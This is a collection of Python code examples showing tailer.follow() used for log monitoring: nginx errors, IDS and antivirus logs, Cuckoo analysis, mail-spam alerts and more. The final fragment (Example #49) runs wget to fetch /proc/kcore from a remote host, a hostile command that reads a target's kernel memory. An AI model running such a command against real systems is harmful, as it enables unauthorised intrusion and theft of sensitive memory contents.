Example #1
 def findpattern_from_file(self):
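     # follow() blocks and yields each new line appended to the file, like tail -f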
     if self.line == 1:
         for line in tailer.follow(self.file):
             self.make_alert(line)
     else:
         for line in tailer.follow(self.file):
             self.check_multiline(line)
Example #2
def op_log_speech(in_logname):
    global rtn_str
    for log_str in tailer.follow(open(in_logname), delay=0.5):
        if log_str.find("SendCmdToVoiceModule") >= 0:   # assume HandleVoiceCmd always receives correctly; only check whether a reply was sent out
            send_str = log_str[log_str.find("SendCmdToVoiceModule"):log_str.find(",")]
            time_str = time.strftime("%F %X ")
            rtn_str = str(time_str) + str(send_str)
Example #3
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):

        # create the message
        date_time_message, otherinfo = nginx_error_parser(line)
        params = [date_time_message[2],
                  date_time_message[0],
                  date_time_message[1],
                  otherinfo.get("request", "-"),
                  otherinfo.get("referrer", "-"),
                  otherinfo.get("server", "-"),
                  otherinfo.get("client", "-"),
                  otherinfo.get("host", "-"),
                  otherinfo.get("upstream", "-")]
        message ='%s' % date_time_message[2]
        extended_message =  '%s\n'\
                            'Date: %s\n'\
                            'Time: %s\n'\
                            'Request: %s\n'\
                            'Referrer: %s\n'\
                            'Server: %s\n'\
                            'Client: %s\n'\
                            'Host: %s\n'\
                            'Upstream: %s\n'
        site = otherinfo.get("referrer", "-")

        # send the message to sentry using Raven
        send_message(message, extended_message, params, site, logger)
Example #4
 def track_ticker(self):
     for line in tailer.follow(open(const.DATA_DIR + "/ticker.jsons")):
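         # each JSON line is a ticker snapshot; check it against every price trigger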
         try:
             ticker = json.loads(line)
             self.data['last_ticker'] = ticker
             if self.on_trigger is not None:
                 for trigger in self.triggers:
                     executed = trigger.get('executed', False)
                     last_price = float(ticker['last'])
                     above = trigger['threshold'] == const.THRESHOLD_PRICE_ABOVE
                     below = trigger['threshold'] == const.THRESHOLD_PRICE_BELOW
                     if not executed and above and last_price > trigger['value']:
                         self.on_trigger('activate', trigger, ticker)
                     if executed and above and last_price <= trigger['value']:
                         self.on_trigger('deactivate', trigger, ticker)
                     if not executed and below and last_price < trigger['value']:
                         self.on_trigger('activate', trigger, ticker)
                     if executed and below and last_price >= trigger['value']:
                         self.on_trigger('deactivate', trigger, ticker)
         except ValueError:
             pass
Example #5
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):

        # create the message
        date_time_message, otherinfo = nginx_error_parser(line)
        params = [
            date_time_message[2], date_time_message[0], date_time_message[1],
            otherinfo.get("request", "-"),
            otherinfo.get("referrer", "-"),
            otherinfo.get("server", "-"),
            otherinfo.get("client", "-"),
            otherinfo.get("host", "-"),
            otherinfo.get("upstream", "-")
        ]
        message = '%s' % date_time_message[2]
        extended_message =  '%s\n'\
                            'Date: %s\n'\
                            'Time: %s\n'\
                            'Request: %s\n'\
                            'Referrer: %s\n'\
                            'Server: %s\n'\
                            'Client: %s\n'\
                            'Host: %s\n'\
                            'Upstream: %s\n'
        site = otherinfo.get("referrer", "-")

        # send the message to sentry using Raven
        send_message(message, extended_message, params, site, logger)
Example #6
def follow_log(file,key):
    if os.path.exists(file):
        if key == 'virus':
            print('Started reading the antivirus log file')
        elif key == 'ids':
            print('Started reading the IDS log')
    else:
        print('Log file not found')
        return
    for line in tailer.follow(open(file, encoding='utf-8', buffering=516)):
        if key == 'virus':
            ls_viruslog = [1, 3, 4, 4, 4, 4]
            log_array = str_split(line, key)
            log_array = remove_arr(log_array, ls_viruslog)
            if log_array[4] == '查杀修复失败':  # '查杀修复失败' = "scan/repair failed"
                msg = virus_module(log_array)
                print(msg)
                app.push_log(msg,'virus')
        elif key == 'ids':
            ls_idslog = [2, 3, 4, 4, 6]
            log_array = str_split(line, key)
            log_array = remove_arr(log_array, ls_idslog)
            if log_array[1] == 'pri=5' or log_array[1] == 'pri=4':
                msg = ids_module(log_array)
                print(msg)
                app.push_log(msg,'ids')
        elif key == 'business':
            trust_ip = ['203.168.15.109']
            business_event = abnormal_business(ip=trust_ip,user='******')
            business_event.is_dangerlogin(line)
            business_event.is_blockedauth(line)
Example #7
    def _start_analysis_monitor(self):
        """
        Monitor completed jobs from Cuckoo to be analyzed
        """
        p = re.compile(ur'#(\d+): analysis procedure completed')
        #Read logs to determine when a task is done
        cuckoo_log = os.path.abspath(
            os.path.join(self.cuckoo_home, "log/cuckoo.log"))
        try:
            for line in tailer.follow(open(cuckoo_log)):
                m = re.search(p, line)
                if m:
                    try:
                        task = int(m.group(1))
                        cuckoo_task_dir = os.path.abspath(
                            os.path.join(self.cuckoo_home,
                                         "storage/analyses/" + str(task) +
                                         "/"))
                        logger.info("Analyzing " + str(cuckoo_task_dir))
                        result = self.analyze_cuckoo_sample(cuckoo_task_dir)
                        if result:
                            logger.info("Analysis complete")
                            if result.active:
                                logger.info(
                                    "Active ransomware found in task " +
                                    str(cuckoo_task_dir))
                                self.active_sample(cuckoo_task_dir, result)
                            else:
                                logger.info("Malware not active")

                    except Exception as e:
                        logger.exception(e)

        except Exception as e:
            logger.exception(e)
Example #8
    def report_progress(self, max_retry_times=20):
        ''' Show progress of ffmpeg rendering progress file.
            It has no return. It is a blocking thread.
        '''
        retry = max_retry_times
        while retry:
            if self.progressfilename is None:
                self._report_progress({'report': 'Progress File Not Exist'})
                retry -= 1
                time.sleep(0.5)  # Sleep 0.5 then retry
                continue

            try:
                with open(self.progressfilename, 'r') as f:
                    status_dict = {}  # The dict object hold the ffmpeg status
                    for each_status_line in tailer.follow(f):
                        pure = each_status_line.strip().split('=')
                        key, value = pure  # unpack the key value pair.
                        status_dict[key] = value
                        if key == 'progress':  # We hit the bottom line of ffmpeg report, periodically.
                            self._report_progress(status_dict)
                            status_dict = {}

                        if key == 'progress' and value == 'end':
                            retry = -1
                            status_dict = {}
            except IOError:
                self._report_progress(
                    {'report': 'Cannot Read Progress File. IOError.'})
                time.sleep(0.1)  # Sleep 0.1 then retry
                retry -= 1
Example #9
def main():
    brand_2_old = ''
    for raw in tailer.follow(open('/tmp/raw_data.txt', 'r')):
        if args.brand == 1:
            if 'showQuestion' in raw:
                game = GetAnswer(args.brand, raw)
                game.run()
        elif args.brand == 2:
            try:
                raw = raw.split('(')[-1].split(')')[0]
                raw_json = json.loads(raw)
                raw_question = raw_json['data']['msg']['answer']['doing'][
                    'doing']['title']
                raw_question_showanswer = raw_json['data']['msg']['answer'][
                    'doing']['doing']['show_answer']
                if not raw_question_showanswer:
                    if raw_question != brand_2_old:
                        game = GetAnswer(args.brand, raw_json)
                        game.run()
                    brand_2_old = raw_question
            except Exception as e:
                continue
        else:
            print("python3 search_question -h")
            print("请查看帮助文档,目前仅支持两个APP的抓包获取题目。")
            sys.exit(1)
Example #10
    def readLog():

        #take the file and read its last line
        last_line = tailer.tail(open('myLogFile.txt'), 1)
        #follow the file as it grows
        for line in tailer.follow(open('myLogFile.txt')):
            print(line)
Example #11
 def logger(self):
     for line in follow(open('log/nmea_muxer.log')):
         if self.logging:
             self.socketio.emit('logline', {"line": line},
                                namespace='/livelogs')
         else:
             return
Example #12
def find_poller():
    """Example of how to send server generated events to clients."""
    socketio.sleep(10)
    for line in tailer.follow(open(sconf.f_out)):
        idx, score, rect = parse_find_line(line)
        send_new_result(idx, score, rect)
        if sconf.nn_thread is None:
            return True
Example #13
def main():  # pragma: no cover
    mimic_service.prepare_service(sys.argv)
    CONF.log_opt_values(LOG, logging.INFO)
    LOG.info("mimic log service start, scanning %s." %
             CONF.uos_install_stage2_log)
    commands.getstatusoutput("touch %s" % CONF.uos_install_stage2_log)
    for line in tailer.follow(open(CONF.uos_install_stage2_log)):
        get_status_from_input(line)
Example #14
def tail(logfile: Path) -> None:
    colorama.init()
    for line in tailer.follow(open(logfile), delay=0.3):
        # "https://www.devdungeon.com/content/colorize-terminal-output-python"
        # If using Windows, init() will cause anything sent to stdout or stderr
        # to have ANSI color codes converted to the Windows versions. Hooray!
        # If you are already using an ANSI compliant shell, it won't do anything
        print(line)
Example #15
def watch_thread(data):
	for l in tailer.follow(open(tailer_file)):
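		# parse each counterparty log line into a dict of fields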
		try:
			d = cpl.parse(l)
		except Exception:
			continue
		
		actiontime = datetime.datetime.strptime(d['timestamp'], '%Y-%m-%d-T%H:%M:%S+0000')
		currenttime = datetime.datetime.utcnow()
		diff = currenttime - actiontime
		# strip microseconds
		currenttime = currenttime.strftime("%Y-%m-%d %H:%M:%S")
		
		d['timestamp_utc'] = str(actiontime)
		d['timestamp_tz'] = datetime.datetime.now(pytz.timezone('America/Denver')).strftime('%Y-%m-%d %H:%M:%S') # <-- this does not 
		d['current_timestamp'] = str(currenttime)
		d['timestamp_diff'] = str(diff)
		
		socketio.emit('new actiontime', d, namespace='/counterpartywatch')
		
		if d['command'] == 'Send':
			socketio.emit('new send', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Issuance':
			if d['issueaction'] == 'created':
				socketio.emit('new issuance', d, namespace='/counterpartywatch')
			elif d['issueaction'] == 'locked':
				socketio.emit('new lock', d, namespace='/counterpartywatch')
				
		#*RPS************************************************
		elif d['command'] == 'RPS':
			socketio.emit('new rps', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'RPS Match':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			socketio.emit('rps match', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'RPS Resolved':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			if 'counterparty_move' in d.keys():
				d['counterparty_move_text'] = numtorps[int(d['counterparty_move'])]
			
			socketio.emit('rps resolved', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Expired RPS':
			d['tx_hash'] = d['tx_hash'][0 : 64] # truncate tx_hash to first 64 characters
			socketio.emit('rps expired', d, namespace='/counterpartywatch')
			
		elif d['command'] == 'Expired RPS Match':
			d['tx_hash'] = d['tx_hash'][0 : 64]
			socketio.emit('rps expiredmatch', d, namespace='/counterpartywatch')
		#******************************************************
		elif d['command'] == 'Bet':
			socketio.emit('new bet', d, namespace='/counterpartywatch')
		elif d['command'] == 'Expired bet':
			socketio.emit('expired bet', d)
		elif d['command'] == 'Block':
			socketio.emit('new block', d, namespace='/counterpartywatch')
Example #16
def read_file_logs():
  for line in tailer.follow(open(obj["file_logs_path"])):
    file_data=str(line).split(",")
    packet["time"]=str(file_data[0]).lstrip()
    packet["action"]=str(file_data[1]).lstrip()
    packet["paths"] =str(file_data[2]).lstrip()
    packet["user"] = str(file_data[3]).lstrip()
    file_log=json.dumps(packet)
    write_on_secure_socket(file_log)
Example #17
async def tail_log(task_id, send):
    log_file_path = os.path.join(settings.DEPLOY_LOG_PATH, f'{task_id}_log')
    if os.path.exists(log_file_path):
        for line in tailer.follow(open(log_file_path)):
            await send({'type': 'websocket.send', 'text': json.dumps(line)})
    else:
        await send({
            'type': 'websocket.send',
            'text': json.dumps(f'{log_file_path} not exist')
        })
Example #18
 def evaluate_file(self, file):
     (file_name, file_config) = file
     regex = utils.tokens_to_pattern(file_config['tokens'])
     with open(expanduser(file_config['path'])) as file:
         for line in tailer.follow(file):
             for alert in self._alerts[file_name].values():
                 matches = re.match(regex, line)
                 if matches:
                     gd = matches.groupdict()
                     alert.evaluate(gd, line)
Example #19
def main_func(filename, cross_finger, message, fields, grep, name):
    buffer = defaultdict(list)

    fields = set(filter(None, fields.split(',')))

    def print_if_needed(item, line):
        if message:
            if re.search(message, item['@message'], re.I) is None:
                return
        if grep:
            if re.search(grep, line, re.I) is None:
                return
        if name:
            if re.search(name, item['@fields'].get('name', ''), re.I) is None:
                return
        print_item(item, fields)

    if filename:
        stream = open(filename)
        stream = tailer.follow(stream)
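        # tailer.follow() turns the open file into a generator that yields lines as they are appended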
    else:

        def unbuffered_lines(stream):
            while True:
                line = stream.readline()
                if line == '':
                    return

                yield line

        stream = unbuffered_lines(sys.stdin)

    for line in stream:
        try:
            item = anyjson.deserialize(line)
        except:
            continue

        if cross_finger:
            fields = item['@fields']
            if 'uuid' in fields:
                uuid = fields['uuid']
                buffer[uuid].append(item)
                if fields['level'] == 'ERROR':

                    echo('')
                    echo('=' * 80)
                    for item in buffer[uuid]:
                        print_if_needed(item, line)
                    del buffer[uuid]
            else:
                if fields['level'] == 'ERROR':
                    print_if_needed(item, line)
        else:
            print_if_needed(item, line)
Example #20
def main():
    global public_ip
    public_ip = get_public_ip()
    file = open(args.file, "r", encoding="utf-8")

    write_logging("Start")

    follow = tailer.follow(file)  # tailer.follow() returns a single generator of new lines
    stop_line_cnt = 0
    access_count = {}
    ban_status = {}
    date_min_last = ""
    for line in follow:

        if args.verbose > 3:
            print(line)
        stop_line_cnt += 1
        data = re.search(line_format_regex, line)
        if data:
            data_dict = data.groupdict()
            try:
                data_dict['post_dict'] = json.loads(data_dict['post_data'])
            except Exception as e:
                data_dict['post_dict'] = {}

            if args.verbose > 3:
                print(data_dict)

            datetimestring = parse(data_dict['dateandtime'][:11] + " " + data_dict['dateandtime'][12:])
            date_min_now = str(datetimestring)[:16]

            real_ip = data_dict["real_ip"]

            if args.verbose > 1:
                print(f"-- {real_ip} {data_dict['post_dict'].get('method')}, {data_dict['post_dict']}")

            if data_dict['post_dict'].get("method") == "icx_sendTransaction":
                # dump(data_dict['post_dict'])

                if args.verbose > 1:
                    print(f"- IN {real_ip}")
                access_count = count_up_dict(access_count, real_ip)

            if date_min_last != date_min_now:
                ban_status = actions(access_count, ban_status, date_min_last, date_min_now)

                if args.verbose > 3:
                    dump(access_count)
                    dump(ban_status)

                access_count = {}

            date_min_last = date_min_now
        else:
            print(f"[ERROR] {line}")
Example #21
 def tail(self, monfile):
     '''
     Follow the file and yield new lines, similar to tail -f filename.
     '''
     try:
         while True:
             for line in tailer.follow(monfile, 1):  # 1 = polling delay in seconds
                 time.sleep(0.1)
                 yield line
     except Exception:
         self.logger.error("Error while parsing log file.")
Example #22
def read_iperf(file_name, graphite, target):
    start_time = int(time.time())
    for line in tailer.follow(open(file_name)):
        result = parse_line(line)
        if result is not None:
            print(result)
            send_to_graphite(graphite, str(target), result[0],
                             start_time + result[1])
        print(line)
        if line == 'EXIT':
            break
Example #23
def run_sfw():
    """

    Returns:

    """
    prev_logline = ''
    dhcp_ack_re = re.compile(DHCPACK_IP_ADDRESS)
    dhcp_discover_eth0_re = re.compile(DHCPDISCOVER_NO_ADDRESS_ETH0)
    dhcp_discover_eth1_re = re.compile(DHCPDISCOVER_NO_ADDRESS_ETH1)
    dns_query_re = re.compile(DNS_QUERY)
    if GSB_ENABLE:
        sbl = gsb_init()

    prev_allocated_mac = ""
    for logline in tailer.follow(open(DNSMASQ_LOG_FILE)):
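        # a DHCPACK line yields the allocated IP (group 1) and the client MAC (group 2)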

        dhcp_ack = dhcp_ack_re.search(logline)
        if dhcp_ack:
            add_ip_mac_log_q(dhcp_ack.group(1), dhcp_ack.group(2))
            add_ip_scan_q(dhcp_ack.group(1))
            continue

        dhcp_discover_eth0 = dhcp_discover_eth0_re.search(logline)
        dhcp_discover_eth1_prev = dhcp_discover_eth1_re.search(prev_logline)
        # print("prev :",prev_logline)
        # print("current :", logline)
        if dhcp_discover_eth0 and dhcp_discover_eth1_prev:
            print("eth0,eth1 : ", dhcp_discover_eth0.group(2))
            if prev_allocated_mac != dhcp_discover_eth0.group(2):
                add_device_q(dhcp_discover_eth0.group(2))
                prev_logline = ""  # New need to confirm working
                prev_allocated_mac = dhcp_discover_eth0.group(2)
                time.sleep(1)
                continue

        dhcp_discover_eth1 = dhcp_discover_eth1_re.search(logline)
        dhcp_discover_eth0_prev = dhcp_discover_eth0_re.search(prev_logline)
        if dhcp_discover_eth1 and dhcp_discover_eth0_prev:
            print("eth1,eth0 : ", dhcp_discover_eth1.group(2))
            if prev_allocated_mac != dhcp_discover_eth1.group(2):
                add_device_q(dhcp_discover_eth1.group(2))
                prev_logline = ""
                prev_allocated_mac = dhcp_discover_eth1.group(2)
                time.sleep(1)
                continue

        dns_query = dns_query_re.search(logline)
        if dns_query:
            # print(dns_query.group(1) + "," + dns_query.group(2))
            add_dns_query_q(dns_query.group(1), dns_query.group(2))
        prev_logline = logline
Example #24
 def run(self):
     for row in tailer.follow(open(self.log_path)):
         # TODO refactoring using visitor pattern
         section = Monitor.get_section(row)
         self.timed_queue.put(section)
         if section is not None and section != '':
             if section in self.counter:
                 self.counter[section] = self.counter[section] + 1
             else:
                 self.counter[section] = 1
             if self.counter[section] > self.maxcount:
                 self.maxcount = self.counter[section]
                 self.maxsection = section
Example #25
    def _collect_log(self, identifier, log, output, canceller):
        for line in tailer.follow(open(log.path)):
            try:
                data = log.regexp.match(line).groupdict()
            except AttributeError:
                data = {}
            else:
                data = log.parser.parse(data)

            output.write(identifier, log.path, data)

            if self.graceful_shutdown.is_set() or canceller.is_set():
                return
Example #26
 def run(self):
     try:
         import tailer
     except ImportError:
         print_("You must install tailer.", file=sys.stderr)
         exit(1)
     log = self.node.logfilename()
     try:
         for line in tailer.follow(open(log), delay=0.1):
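             # delay=0.1: poll the log for new lines every 100 ms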
             print_(line)
     except KeyboardInterrupt:
         print_('\n')
         pass
Example #27
 def handleMessage(self):
     while not os.path.isfile(self.logfile):
         time.sleep(0.1)
     import tailer
     for line in tailer.follow(open(self.logfile)):
         print(line)
         # if not connected:
         #     break
         if line is not None:
             time.sleep(0.1)
             send(line + '\n', broadcast=False)
         else:
             time.sleep(0.2)
Example #28
def show_log(app_name, ins_num):
    """
    查看应用日志
    """
    app_base_dir, log_base_dir, backup_base_dir, rollback_base_dir, app_prefix, app_type, app_dir, raw_dir = get_var(
        app_name, ins_num)
    log_file = os.path.join(log_base_dir, app_name, 'log', app_name + '.log')

    if os.path.exists(log_file):
        highlight('Tailing log %s' % log_file, 'prompt')
        for line in tailer.follow(open(log_file)):
            print line
    else:
        highlight('Log %s does not exist' % log_file, 'warn')
Example #29
    def log_watcher(self):
        """
        Watches the log file for this instance, and sends lines to be processed
        """   
        self.log_await()
            
        # When / if this process hits a problem, have it auto restart again
        try:
        
            for line in tailer.follow(open(self.instance.config['server']['log_path'])):
                self.instance.log_handler.process(line)

        except Exception as e:
            self.instance.exception_handler.log(e)    
            self.log_watcher()
Example #30
    def transfer(self):

        while True:
            try:
                for line in tailer.follow(self.logfile, retry=True):
                    _ = line.strip()
                    if _:
                        self.sock.send(packb(_))
            except KeyboardInterrupt:
                self.sock.close()
                self.logger.info('SIGINT detected')
                return
            except:
                from traceback import format_exc
                self.logger.error("{0}{1}".format("\n", format_exc()))
Example #31
    def run(self):
        ## get current position
        with open(path.join(self.path, "LoadingScreen.log")) as f:
            if self.get_position(f.readlines()):
                self.set_collector()

        start_new_thread(self.run_collector, ())

        # watch file
        for line in tailer.follow(
                open(path.join(self.path, "LoadingScreen.log"))):
            if self.get_position([line]):
                self.lock.acquire()
                self.set_collector()
                self.lock.release()
Example #32
def tailf(logfile):
    print("Starting to monitor {0} with pattern for rclone {1}".format(
        logfile, cfg['backend']))

    for line in tailer.follow(open(logfile)):
        if re.match(
                r".*(mkv:|mp4:|mpeg4:|avi:) received cache expiry notification",
                line):
            search = re.search(
                r'^[0-9]{4}\/[0-9]{2}\/[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2} INFO  : (.*): received cache expiry notification',
                line, re.IGNORECASE)
            if search is not None:
                f = search.group(1)
                print("Detected new file: {0}".format(f))
                scan(os.path.dirname(f))
Example #33
 def followTarget(self):
     # uses tailer to follow the output of the running process
     if os.name == "nt":
         flags = os.O_RDWR | os.O_TEMPORARY
     else:
         flags = os.O_RDWR
     
     try:
         f = os.open(self.outfileName, flags)
         fo = os.fdopen(f, 'r')
         generator = tailer.follow(fo)
         for l in generator:
             print l
     finally:
         fo.close()  # closing the file object also closes the descriptor from os.open()
Example #34
 def run(self):
     for line in tailer.tail(open(self.page.file_path), self.page.plugin.lines):
         g15screen.run_on_redraw(self._add_line, line)
     self.fd = open(self.page.file_path)
     try:
         for line in tailer.follow(self.fd):
             if self._stopped:
                 break
             g15screen.run_on_redraw(self._add_line, line)
             if self._stopped:
                 break
     except ValueError as e:
         logger.debug("Error while reading", exc_info = e)
         if not self._stopped:
             raise e
     self.page.redraw()
Example #35
def main():
    #check that the log path exists
    if not os.path.isfile(config.game_log_path):
        print("ERROR: game_log_path does not exist!")
        return

    #track the game log as it grows
    for line in tailer.follow(open(config.game_log_path, encoding='utf8'),
                              delay=0.05):
        if 'ˇˇ' not in line:
            if "] @來自 " in line:  #2020/06/09 12:13:04 72356671 acf [INFO Client xxx] @來自 <公會> 遊戲ID: 內容
                message = '私人訊息\n' + line[line.find('] @來自 ') + 6:]  # '私人訊息' = "private message"
                lineNotifyMessage(message)

            elif "] %" in line:  #2020/06/09 23:10:44 111816734 acf [INFO Client xxx] %<公會> 遊戲ID: 內容
                message = '隊伍訊息\n' + line[line.find('] %') + 3:]  # '隊伍訊息' = "party message"
                lineNotifyMessage(message)
Example #36
 def run(self):
     for line in tailer.tail(open(self.page.file_path),
                             self.page.plugin.lines):
         g15screen.run_on_redraw(self._add_line, line)
     self.fd = open(self.page.file_path)
     try:
         for line in tailer.follow(self.fd):
             if self._stopped:
                 break
             g15screen.run_on_redraw(self._add_line, line)
             if self._stopped:
                 break
     except ValueError as e:
         logger.debug("Error while reading", exc_info=e)
         if not self._stopped:
             raise e
     self.page.redraw()
Example #37
    def track_ticker(self):
        for line in tailer.follow(open(const.DATA_DIR + "/ticker.jsons")):
            try:
                ticker = json.loads(line)
                self.data['last_ticker'] = ticker
                if self.on_trigger is not None:
                    for trigger in self.triggers:
                        executed = trigger.get('executed', False)
                        last_price = float(ticker['last'])
                        if not executed and trigger['threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price > trigger['value']:
                            self.on_trigger('activate', trigger, ticker)
                        if executed and trigger['threshold'] == const.THRESHOLD_PRICE_ABOVE and last_price <= trigger['value']:
                            self.on_trigger('deactivate', trigger, ticker)
                        if not executed and trigger['threshold'] == const.THRESHOLD_PRICE_BELOW and last_price < trigger['value']:
                            self.on_trigger('activate', trigger, ticker)
                        if executed and trigger['threshold'] == const.THRESHOLD_PRICE_BELOW and last_price >= trigger['value']:
                            self.on_trigger('deactivate', trigger, ticker)
            except ValueError:
                pass
Example #38
def _open(ctx, path, key, needs_tailf=False):
    fernet = Fernet(key)

    # Plain open
    f = open(path)

    # tail -f
    if needs_tailf:
        f = follow(f, delay=0.1)

    for line in f:
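        # each line is "<prefix><log_prefix><fernet token>"; decrypt the token half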
        prefix, encrypted = line.split(log_prefix)
        try:
            if isinstance(encrypted, str):
                encrypted = encrypted.encode('utf8')

            sys.stdout.write('{}{}\n'.format(prefix, fernet.decrypt(encrypted).decode('utf8')))
            sys.stdout.flush()
        except InvalidToken:
            sys.stderr.write('Invalid crypto key\n')
            sys.exit(1)
Example #39
def nginx():

    logger = "Nginx error logs"

    for line in tailer.follow(open(filepath)):
        line = unicode(line, errors='ignore')
        years = line[0:4]
        if (re.match('^\\s*$',line)):
            pass
        else:
            if (re.match(r'^\d+$',years)):

                # create the message
                date_time_message, otherinfo = nginx_error_parser(line)
                params = [date_time_message[2],
                          date_time_message[0],
                          date_time_message[1],
                          otherinfo.get("request", "-"),
                          otherinfo.get("referrer", "-"),
                          otherinfo.get("server", "-"),
                          otherinfo.get("client", "-"),
                          otherinfo.get("host", "-"),
                          otherinfo.get("upstream", "-")]
                message ='%s' % date_time_message[2]
                extended_message =  '%s\n'\
                                    'Date: %s\n'\
                                    'Time: %s\n'\
                                    'Request: %s\n'\
                                    'Referrer: %s\n'\
                                    'Server: %s\n'\
                                    'Client: %s\n'\
                                    'Host: %s\n'\
                                    'Upstream: %s\n'
                site = otherinfo.get("referrer", "-")
                
                # send the message to sentry using Raven
                send_message(message, extended_message, params, site, logger)
            else:
                pass
Example #40
    def follow_tail(self):
        """
        Read (tail and follow) the log file, parse entries and send messages
        to Sentry using Raven.
        """
        try:
            logfile = open(self.filepath)
        except (FileNotFoundError, PermissionError) as err:
            exit("Error: Can't read logfile %s (%s)" % (self.filepath, err))

        for line in tailer.follow(logfile):
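            # reset per-line state before parsing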
            self.message = None
            self.extended_message = None
            self.params = None
            self.site = None

            self.parse(line)
            send_message(self.message,
                         self.extended_message,
                         self.params,
                         self.site,
                         self.logger)
Example #41
def nginx(opts=None):
    filepaths = {}

    nginx_error_path = getattr(opts, "nginxerrorpath", False)
    nginx_access_path = getattr(opts, "nginxaccesspath", False)
    
    if nginx_error_path:
        filepaths["error"] = {"filepath": nginx_error_path, "parser": nginx_error_parser}
    if nginx_access_path:
        filepaths["access"] = {"filepath": nginx_access_path, "parser": nginx_access_parser}

    for k,v in filepaths.iteritems():
        logger = "Nginx %s logs" % k
        filepath = v['filepath']
        parser = v['parser']
        
        if opts.parsehistory:
            # We're going to zcat all the log files and then parse them line by line
            for f in glob.glob(filepath+"*"):
                print "Parsing File: %s" % f
                
                if f.endswith(".gz"):
                    proc = subprocess.Popen(['zcat', f], stdout=subprocess.PIPE)
                    file = proc.stdout
                else:
                    file = open(f, 'rb')
                
                for line in file:
                    parse_line(opts, parser, logger, line)
        else:
            try:
                f = open(filepath)
            except:
                continue
            else:
                f.close()

            for line in tailer.follow(open(filepath)):
                parse_line(opts, parser, logger, line)
Example #42
def main():
    parser = argparse.ArgumentParser(description='Convert logs to custom fileformat(now supports json and yaml fileformats)', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('input_file', help='file with input logs', type=argparse.FileType('r'))
    parser.add_argument('output_file', help='file with parsed data', type=argparse.FileType('w'))
    # default nginx log_format: '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"' 
    # Note: spaces in log_format is important!
    parser.add_argument('log_format', help='''logs format. Supports: nginx log_format and apache CustomLog, also you may use custom format''')
    parser.add_argument('--log_type', help='type of log file.', choices=['nginx', 'apache', 'custom'], default='nginx')
    parser.add_argument('--result_type', help='type of parsed file', choices=['yaml', 'json'], default='json')
    parser.add_argument('-f', '--follow',  action='store_true', default=False,  help='process appended data as the file grows')
    args = parser.parse_args()
    
    parser = LogParser(args.log_format, args.log_type)
    parsed_logs = []
    try:
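        # with --follow, tail the input file as it grows; otherwise read it once through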
        for record in (tailer.follow(args.input_file) if args.follow else args.input_file):
            parsed_logs.append(parser.parse(record))
    except KeyboardInterrupt:
        print('interrupt received, stopping.')
    finally:
        if args.result_type == 'yaml':
            yaml.dump(parsed_logs, args.output_file, default_flow_style=False)
        elif args.result_type == 'json':
            json.dump(parsed_logs, args.output_file)
Example #43
#!/usr/bin/python

# application to follow the snot log and refresh the snotrocket
# cache as necessary

# doesn't return, must be run as a daemon

from elasticsearch import Elasticsearch
import tailer

from snotrocket_populate import import_ticket
import snotparser.snotparser as sp

snot_log = '/u/snot/test/logs/log'
#snot_log = 'test_log' # for testing
es_index = 'snotrocket'

es = Elasticsearch()


# Follow the snot log file
for line in tailer.follow(open(snot_log)):
    print line
    ticket_number = int(line.split()[9])
    print "processing updates to ticket {0}".format(ticket_number)
    import_ticket(ticket_number, es_index)


Example #44
def getUpDn5():
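	# 0 is tailer.follow's polling delay in seconds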
	return tailer.follow(UpDn5File,0)
Example #45
def followfile(filepath,keywords,filelog):
    filepath = str(filepath)
    for line in tailer.follow(open(filepath)):
        print line
        grepstatus(line,keywords,filelog)
Example #46
 def run(self):
     for line in tailer.follow(self.server_log):
         self.on_server_log(line)
Example #47
                                        autofire(fire,e,a)
                                        a["fired"] = True

                                elif a["asl"]["send_method"] == "url" and e["http"].has_key("url"):
                                    if e["http"].has_key("url") and e["http"]["url"].endswith(".js") and e["http"].has_key("http_refer"):
                                        print "autofiring %s from search_http_for_alert to avoid .js %s " % (e["http"]["http_refer"],e["http"]["url"])
                                        a["fired_url"] = e["http"]["http_refer"]
                                        autofire(e["http"]["http_refer"],e,a)
                                    else:
                                        fire = build_url_from_entry(e)
                                        if fire != None:
                                            print "autofiring %s from search_http_for_alert" % (fire)
                                            a["fired_url"]=fire
                                            autofire(fire,e,a)
                                            a["fired"] = True

            if e["event_type"] == "alert":
                try:
                    if e["alert"]["signature_id"] not in alert_search_ignore_sid:
                        alert_check_search_list(e)
                except Exception as err:
                    print "failed to run alert_check_search %s" % (err)
        except Exception as err:
            print "Exception parsing line %s:\n%s\n%s" % (err,line,sys.exc_info()[-1].tb_lineno)

worker = Process(target=ProcessLOG, args=(log_queue,))
worker.daemon = True
worker.start()
for line in tailer.follow(open(conf["eve_file"])):
    log_queue.put(line)
Example #48
  #send email about lots of emails
  toaddr='*****@*****.**'
  fromaddr='*****@*****.**'
  msg="From: "+fromaddr+"\r\nTo: "+toaddr+"\r\n\r\nWarning: user "+email+" may be spamming on "+hostname+" They have sent over "+\
  str(limit)+" emails in the last hour or since you were last notified "
  subject="Mailbox Outgoing Spam Warning"
  server=smtplib.SMTP('localhost')
  server.sendmail(fromaddr, toaddr, msg)
  toaddr='*****@*****.**'
  server.sendmail(fromaddr, toaddr, msg)
  server.quit()


start_email()
alert('TEST ALERT')
for line in tailer.follow(open('/var/log/mail.log')):
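  # count outgoing mail per sender, matching postfix qmgr "from=<...>" lines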
  regex=re.compile('qmgr.*from=<(.*)>')
  lineres=regex.search(line)
  if lineres is not None:
    email=lineres.group(1)
    try:
      tally[email]+=1
    except KeyError:
      tally[email]=1
    print email,line
    if tally[email]>limit:
     alert(email)
     tally[email]=0
    if datetime.now().minute==0:
     tally={}
Example #49
print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
